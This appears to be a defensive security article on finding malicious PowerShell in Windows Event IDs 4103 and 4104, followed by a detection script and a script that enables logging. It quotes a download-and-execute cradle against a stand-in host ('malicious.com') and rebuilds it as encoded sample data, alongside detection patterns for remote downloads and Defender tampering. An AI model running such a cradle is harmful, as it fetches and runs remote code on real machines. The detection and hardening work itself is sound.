PowerShell is a widely used command-line tool in Windows environments, providing administrators with powerful automation, configuration management, and system control capabilities. However, these same capabilities make it an attractive tool for threat actors seeking to execute malicious commands, evade detection, and maintain persistence within a compromised network. By analyzing Windows Security Event Logs—particularly Event IDs 4103 and 4104—security teams can identify and mitigate potential threats before they escalate.
Why Do Threat Actors Use PowerShell?
PowerShell is a preferred tool for cybercriminals due to its:
- Native Integration: PowerShell is built into Windows, reducing the need for attackers to introduce foreign executables that might trigger security alerts.
- In-Memory Execution: Malicious PowerShell scripts can run directly in memory, avoiding disk-based detection by traditional antivirus solutions.
- Obfuscation Capabilities: Attackers can encode or obfuscate PowerShell commands to bypass security defenses and logging mechanisms.
- System Control & Reconnaissance: PowerShell provides deep access to system components, allowing attackers to gather intelligence, manipulate system configurations, and move laterally within a network.
Windows Security Event ID 4103: PowerShell Module Logging
Event ID 4103 is generated when PowerShell module logging is enabled, capturing details about executed commands and scripts. This log provides insights into PowerShell activities, including:
- Executed Modules: Identifies which PowerShell modules are being used, potentially revealing malicious intent (e.g., Mimikatz, PowerView).
- Obfuscated Commands: Detects encoded or obfuscated scripts attempting to bypass security controls.
- Unexpected Administrative Actions: Flags unauthorized use of administrative PowerShell commands that could indicate privilege escalation or unauthorized access.
Example of a Suspicious 4103 Log Entry:
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Enc SQB... (Base64 Encoded Command)
A Base64-encoded command like the one above may indicate an attacker is attempting to evade detection while executing malicious scripts.
Windows Security Event ID 4104: PowerShell Script Block Logging
Event ID 4104 captures detailed information about executed PowerShell script blocks, including fully expanded and de-obfuscated commands. This makes it particularly useful for:
- Detecting Malicious Code Execution: Identifies scripts executing suspicious commands, such as downloading payloads or disabling security controls.
- Uncovering Obfuscation Techniques: Reveals attackers’ attempts to mask their true intentions by encoding or fragmenting scripts.
- Tracking Attack Progression: Provides insight into how an attacker is interacting with the environment over time.
Example of a Malicious 4104 Log Entry:
ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')
This log entry indicates an attempt to download and execute a remote PowerShell script, a common tactic used in malware deployment and post-exploitation activities.
How Event IDs 4103 and 4104 Uncover Malicious Activity
By monitoring and correlating Event IDs 4103 and 4104, security teams can:
- Identify Attack Techniques: Detect attempts to download remote payloads, escalate privileges, or disable security mechanisms.
- Correlate Suspicious Activities: Link script executions with other system events to determine whether an attack is underway.
- Mitigate Threats Proactively: Alert on abnormal PowerShell usage, automatically flagging or blocking known attack patterns.
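The two log entries quoted above (the Base64 `-Enc` command line in the 4103 example and the download cradle in the 4104 example) can be triaged with a small script. The following is an added example, not code from the original article: it decodes the `-Enc`/`-EncodedCommand` argument the way powershell.exe does (Base64 over UTF-16LE text), scans 4103 and 4104 text for a handful of indicators, and runs first against constructed sample records (built from the article's own two entries, so it works offline) and then, optionally, against the live Microsoft-Windows-PowerShell/Operational log. The indicator list, the function names and the assumption that 4104 keeps its script text in `Properties[2]` while the rendered 4103 message carries a `Host Application = ...` line are mine, not the article's.

```powershell
# Added example, not code from the original article. Decodes -Enc command lines seen in
# 4103 HostApplication fields and scans 4104 ScriptBlockText for a few indicators.
# The indicator list is illustrative, not a complete detection rule set.

# Constructed indicator list: label => case-insensitive regex (-match is case-insensitive).
$SuspiciousPatterns = [ordered]@{
    'Invoke-Expression'  = '\bIEX\b|Invoke-Expression'
    'Remote download'    = 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient'
    'Inline decoding'    = 'FromBase64String'
    'Defender tampering' = 'Set-MpPreference\s.*-Disable|Add-MpPreference\s.*-Exclusion'
}

function ConvertFrom-EncodedCommand {
    # Returns the decoded script for a command line carrying -Enc <base64>, else $null.
    # powershell.exe expects the Base64 to wrap UTF-16LE text, hence the Unicode decoder.
    param([string]$CommandLine)
    if ($CommandLine -notmatch '-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') { return $null }
    try { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
    catch { $null }
}

function Test-SuspiciousScript {
    # Returns the labels of every indicator matching the text (empty array when none match).
    param([string]$ScriptText)
    $labels = foreach ($entry in $SuspiciousPatterns.GetEnumerator()) {
        if ($ScriptText -match $entry.Value) { $entry.Key }
    }
    return @($labels)
}

function Get-PowerShellFindings {
    # Takes records with Id, TimeCreated, HostApplication (4103) or ScriptBlockText (4104)
    # and emits one finding per record that matched at least one indicator.
    param([object[]]$Records)
    foreach ($r in $Records) {
        $decoded = $null
        $text = switch ($r.Id) {
            4103 { $decoded = ConvertFrom-EncodedCommand $r.HostApplication
                   if ($decoded) { $decoded } else { $r.HostApplication } }
            4104 { $r.ScriptBlockText }
        }
        $hits = Test-SuspiciousScript $text
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time       = $r.TimeCreated
                EventId    = $r.Id
                Indicators = $hits -join ', '
                WasEncoded = ($null -ne $decoded)
                Script     = $text
            }
        }
    }
}

function Get-LivePowerShellFindings {
    # Reads the real PowerShell/Operational log (needs logging enabled and read rights).
    # Assumption: 4104 keeps ScriptBlockText in Properties[2] and the rendered 4103
    # message contains a "Host Application = ..." line, as Windows PowerShell 5.1 does.
    param([int]$MaxEvents = 500)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4103, 4104 }
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue
    $records = foreach ($e in $events) {
        $hostApp = $null
        if ($e.Message -match 'Host Application = (.+)') { $hostApp = $Matches[1].Trim() }
        $blockText = $null
        if ($e.Id -eq 4104) { $blockText = $e.Properties[2].Value }
        [pscustomobject]@{ Id = $e.Id; TimeCreated = $e.TimeCreated
                           HostApplication = $hostApp; ScriptBlockText = $blockText }
    }
    Get-PowerShellFindings $records
}

# Constructed sample records mirroring the two entries quoted in the article. The encoded
# command is built from the article's 4104 example, so decoding it is reproducible.
$cradle  = "IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($cradle))
$SampleRecords = @(
    [pscustomobject]@{ Id = 4103; TimeCreated = Get-Date; ScriptBlockText = $null
        HostApplication = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Enc $encoded" }
    [pscustomobject]@{ Id = 4104; TimeCreated = Get-Date; HostApplication = $null
        ScriptBlockText = $cradle }
    [pscustomobject]@{ Id = 4104; TimeCreated = Get-Date; HostApplication = $null
        ScriptBlockText = 'Get-ChildItem C:\Logs | Where-Object Length -gt 1MB' }   # benign admin use
)

# Offline run: the first two sample records are reported, the benign one is not.
Get-PowerShellFindings $SampleRecords | Format-Table -AutoSize
```

Running the sample set reports the 4103 record with `WasEncoded = True` and the same decoded text as the 4104 record, which is the correlation point the section describes: the encoded command line and the expanded script block describe one action. Call `Get-LivePowerShellFindings` on a host with both logging policies enabled to apply the same logic to real events; note that the `-Enc` decoder only handles the whole-command Base64 form and that `Invoke-Expression` alone matches plenty of legitimate administrative scripts, so the indicator labels are a triage aid rather than an alert on their own.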
Defensive Measures Against PowerShell-Based Attacks
To reduce the risk of PowerShell exploitation, organizations should:
- Enable Logging: Ensure PowerShell Module Logging (Event ID 4103) and Script Block Logging (Event ID 4104) are turned on.
- Implement Constrained Language Mode: Restrict PowerShell’s ability to execute advanced scripts unless explicitly authorized.
- Monitor and Analyze Logs: Use SIEM solutions to detect, alert, and respond to anomalous PowerShell activity.
- Restrict PowerShell Access: Limit PowerShell usage to necessary personnel and enforce execution policies.
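The first two measures can be applied and verified from an elevated PowerShell session. The following is an added example, not code from the original article: it writes the same policy registry values that the "Turn on Module Logging" and "Turn on PowerShell Script Block Logging" Group Policy settings write, then reads the configuration back along with the session's language mode. The key paths are the standard Windows PowerShell policy keys; the function names and the shape of the audit object are mine.

```powershell
# Added example, not from the original article. Enables Module Logging (4103) and Script
# Block Logging (4104) via the policy registry keys Group Policy uses, then audits them.
# Requires an elevated session. Windows PowerShell policy keys; PowerShell 7 reads its own
# keys under HKLM:\SOFTWARE\Policies\Microsoft\PowerShellCore unless told to reuse these.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    # Module logging needs a ModuleNames list; a value named '*' records every module (Event ID 4103).
    $module = Join-Path $PolicyRoot 'ModuleLogging'
    New-Item -Path (Join-Path $module 'ModuleNames') -Force | Out-Null
    New-ItemProperty -Path $module -Name 'EnableModuleLogging' -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path (Join-Path $module 'ModuleNames') -Name '*' -Value '*' -PropertyType String -Force | Out-Null

    # Script block logging (Event ID 4104). Invocation logging (4105/4106) stays off: it is
    # very noisy and the script text carried by 4104 is what detection needs.
    $block = Join-Path $PolicyRoot 'ScriptBlockLogging'
    New-Item -Path $block -Force | Out-Null
    New-ItemProperty -Path $block -Name 'EnableScriptBlockLogging' -Value 1 -PropertyType DWord -Force | Out-Null
    New-ItemProperty -Path $block -Name 'EnableScriptBlockInvocationLogging' -Value 0 -PropertyType DWord -Force | Out-Null
}

function Get-PolicyValue {
    # Returns a named registry value, or $null when the key or value is absent.
    # GetValue is used instead of Get-ItemProperty because '*' would be treated as a wildcard name.
    param([string]$Path, [string]$Name)
    try { (Get-Item -Path $Path -ErrorAction Stop).GetValue($Name) } catch { $null }
}

function Test-PowerShellLoggingPolicy {
    # One object summarising the state of the article's first two defensive measures.
    $opLog = Get-WinEvent -ListLog 'Microsoft-Windows-PowerShell/Operational' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ModuleLogging      = (Get-PolicyValue "$PolicyRoot\ModuleLogging" 'EnableModuleLogging') -eq 1
        ModuleNamesAll     = (Get-PolicyValue "$PolicyRoot\ModuleLogging\ModuleNames" '*') -eq '*'
        ScriptBlockLogging = (Get-PolicyValue "$PolicyRoot\ScriptBlockLogging" 'EnableScriptBlockLogging') -eq 1
        OperationalLogOn   = if ($opLog) { $opLog.IsEnabled } else { $false }
        # FullLanguage unless a WDAC/AppLocker policy enforces ConstrainedLanguage for this user.
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode.ToString()
    }
}

Enable-PowerShellLogging
Test-PowerShellLoggingPolicy
```

Two points worth checking after running it. First, `LanguageMode` reports the current session only: assigning `ConstrainedLanguage` to `$ExecutionContext.SessionState.LanguageMode` affects that one session and is not a control; durable Constrained Language Mode comes from a WDAC or AppLocker policy in enforcement mode, which this script does not configure. Second, even with `EnableScriptBlockLogging` unset, Windows PowerShell 5 and later still writes a Warning-level 4104 for script blocks containing terms it considers suspicious, so an empty Operational log is itself a signal that the log may have been cleared or disabled rather than that nothing ran.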
Conclusion
Threat actors rely on PowerShell due to its powerful capabilities and stealthy execution methods. However, by proactively monitoring Windows Security Event IDs 4103 and 4104, organizations can uncover malicious activity, analyze threat actor tactics, and respond before significant damage occurs. Strengthening PowerShell security policies and implementing continuous monitoring will significantly reduce the risk of exploitation and improve an organization’s overall cybersecurity resilience.